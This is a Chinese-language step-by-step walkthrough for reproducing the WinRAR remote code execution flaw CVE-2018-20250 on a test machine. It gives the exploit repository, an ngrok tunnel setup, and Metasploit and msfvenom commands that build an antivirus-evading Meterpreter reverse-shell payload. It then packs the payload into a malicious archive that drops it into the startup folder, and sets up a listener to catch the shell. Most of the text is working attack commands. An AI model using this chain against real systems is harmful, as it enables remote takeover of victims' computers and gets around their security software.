准备环境
WinRAR < 5.70 (UNACEV2.DLL还存在)
我使用的WinRAR版本: 5.61.0.0.
靶机:我使用的时win10 1903专业版
靶机条件:需要关掉安全中心,不然会把恶意文件删掉
WINRAR下载:http://zdfans7.com/WinRAR_5737.zip
exp下载:https://github.com/WyAtu/CVE-2018-20250.git
git clone https://github.com/WyAtu/CVE-2018-20250.git
CVE-2018-20250漏洞利用复现
1、下载WinRAR远程代码执行漏洞EXP
https://github.com/WyAtu/CVE-2018-20250
2、配置ngrok
https://www.ngrok.cc
选择服务器,我选择的是免费的ngrok服务器
开通一个免费的隧道转发代理,把ngrok隧道协议设置成 TCP,内网 IP 改成自己的 kali 里的内网 IP,内网端口随便填,不冲突就行。
3、下载ngrok脚本
我选择的是 Linux 64Bit版本 。先切换到sunny所在目录下再运行脚本。
./sunny clientid 隧道ID
4、使用msf生成payload
msfconsole
use evasion/windows/windows_defender_exe # (选择msf5免杀模块)
show info #(显示模块信息)
set filename WinRarPayloadTest.exe #(设置Payload名字 )
set payload windows/meterpreter/reverse_tcp #(设置Payload类型 )
set lhost free.idcfengye.com #(设置上线地址,填写Ngrok映射出去的地址即可)
set lport 10975 #(设置监听端口,填写Ngrok映射出去的端口即可 )
run #(生成Payload)
5、生成恶意文件
设置完之后,运行python3 exp.py 来生成恶意文件
python3 exp.py
6、对方解压
每当对方重启电脑时,启动项里的应用都会随之而启动
7、使用监听模块,并设置参数
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.102 #(ngrok对应的ip)
set lport 45567 #(ngrok对应的端口)
run
另一种复现手法
1、下载WinRAR漏洞
exp下载:https://github.com/WyAtu/CVE-2018-20250.git
2、利用msfbenom生成恶意文件
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444-f exe >./msf.exe
3、把生成的msf.exe复制到对应的exp里去
cp
打开exp.py并修改对应的地方
利用 python3 运行exp.py生成对应的压缩包名字
python3 exp.py
4、把生成的恶意文件发送给靶机
一旦靶机解压恶意文件
5、使用监听模块,并设置参数
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.102
set lport 4444
运行run,监听靶机是否运行了恶意文件hi.exe